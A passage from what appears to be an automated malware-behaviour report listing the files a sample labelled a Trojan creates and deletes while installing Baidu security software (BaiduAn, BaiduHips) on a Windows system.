%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnUpdate.exe (34365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCallbackBind.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOSilentCleanerConfig.dat (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMBase.dll (32128 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDDefense.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\systemfile.dat (6 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMNetMon.sys (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vatl.msi (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerConfig.dat (900 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBugRpt.exe (3361 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_3_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Softmgr.rdb (690 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SmartTips.rdb (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy_baiduan.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsUpdate.exe (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\StartupDict.dat (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\8500.dat (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMReport.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense_x64.sys (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerTrayPlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMProcessRunningTime.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAFileHelper.exe (21216 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVEng.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDLogicUtils.dll (10136 bytes)
%Documents and Settings%\All Users\Desktop\百度卫士.lnk (895 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDNetMisc.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr_remind.ico (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_5_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_2_speed.png (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\placeholder_tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVScanPlugin.dll (12088 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度卫士\百度卫士.lnk (907 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageCleanerConfig.dat (12 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMUpdate.rdb (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDConfig.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libeay32.dll (33391 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hipsClient.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSvc.exe (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HipsClient.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurllicense.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\uninst.exe (51840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDKitUtils.dll (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.sys (11144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\DriverManager.dll (8680 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\wverify.dat (15019 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\font_desc.f (873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccStrategyMgr.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBusiness.dll (9320 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SOManager.rdb (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerScript.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt.dll (15168 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Mainpage.rdb (23936 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_1_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch.7z (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMsg.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMStringUtils.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAVCache.dll (34186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonMgrDll.dll (1856 bytes)
%System%\config (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepBase.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\TrustAndIso.dll (14416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWParseDetect.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSupplyId.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.sys (19752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMWindowsLib.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginSetup.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bdmantivirus\BDKitUtils.dll (601 bytes)
%System%\drivers\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysOptDict.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMLog.dll (1552 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_0_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SusPlugin.rdb (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerConfig.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\InstallHelper.dll (37368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_repairproperty.dat (2 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\dl.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMNet.dll (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\preliminary.db (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSCleaner.dll (32824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSoftMgrModule.dll (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度卫士\卸载百度卫士.lnk (880 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\CommonRes.rdb (62035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSafePlugin.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccServicePlugin.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt64.dll (20624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMToolBox.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixer.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWAcc.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerXMLScript.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDDefense.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCommon.dll (10136 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVCached.dll (1425 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray.rdb (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVEng.dll (50840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_class_filter.db (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\kav_compatible.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMReport.dll (25672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_property.dat (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCScriptBind.dll (32824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\EnhanceBoost.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ad.dll (38248 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Patcher.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDDefense_x64.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccTrayPlugin.dll (14184 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_extlist.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\color_desc.clr (213 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\policy.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduPrevUIn.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOHomePageCleanerConfig.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcherPlugin.dll (39770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\pluginUnit.dat (727 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray\TrayPlugin.rdb (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSAccMgrDll.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWHelper.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsCore.dll (30344 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SafePlugin.rdb (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeXMLScript.dat (519 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHips.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\ns19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNetComm.dll (12088 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_9_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMScriptVM.dll (8184 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_8_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\blacksign.dat (1389 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMFrameWork.dll (21480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSusPlugin.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ccesign.dat (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTrayTipsPlugin.dll (23424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMainFrame.dll (34773 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOPluginCleanerConfig.dat (441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\install_res.rdb (40702 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMConnect.dll (28288 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_4_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysAccelerator.rdb (6584 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0002.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0001.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0001.sys (673 bytes)
%System%\config\system (6543 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\openssllicense.txt (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWManagerView.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAccount.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bduf.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSkin.dll (33263 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_minute_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccDataMgr.dll (11048 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVMain.rdb (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\placeholder_tmp (11 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduPrevUIn.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysRepLib.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSWPlugin.exe (784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMFrameWork.dll (1425 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\TrustAndIso.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTinyXml.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMFrameWork.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\cache_config.dat (469 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerPlugin.dll (88648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerCheckItem.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMNet.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDALeakfixer.exe (27704 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysFixer.rdb (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUpdate.dll (14840 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMWrench.sys (7192 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (1068 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NetService.ini (1205 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDPerflog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SWCatalogDataItem.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HotPlugins.xml (386 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMLog.dll (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCloudEng.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSmartTip.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginConfig.db (62035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeConfig.dat (497 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMSetting.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDLogicUtils.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\skin_engine.dll (13584 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\systemfile.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUserCenter.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDriverFixer.dll (16368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\WebSafe.dll (33455 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)

The Trojan deletes the following file(s):

%Program Files%\baidu\BaiduAn\3.0.0.3971\baiduan_number_new.ttf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\System.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDArKit.sys (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\dl.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0001.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDArKit.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\nsExec.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch.7z (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\text_cn.str (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDDefense.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\vcrt.msi (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\vatl.msi (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\NetService.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSystemVer.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BaiduAnBugRpt.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\install_res.rdb (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDLogicUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\systemfile.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度卫士 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\font_desc.f (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\7z.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSupplyId.dll (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度卫士\百度卫士-软件管理.lnk (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\InstallHelper.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_self_enc.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMNet.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\blacksign.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\InstallCfg.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDDefense_x64.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\bddownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\color_desc.clr (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0001.sys (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\bdcomproxy.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe (0 bytes)
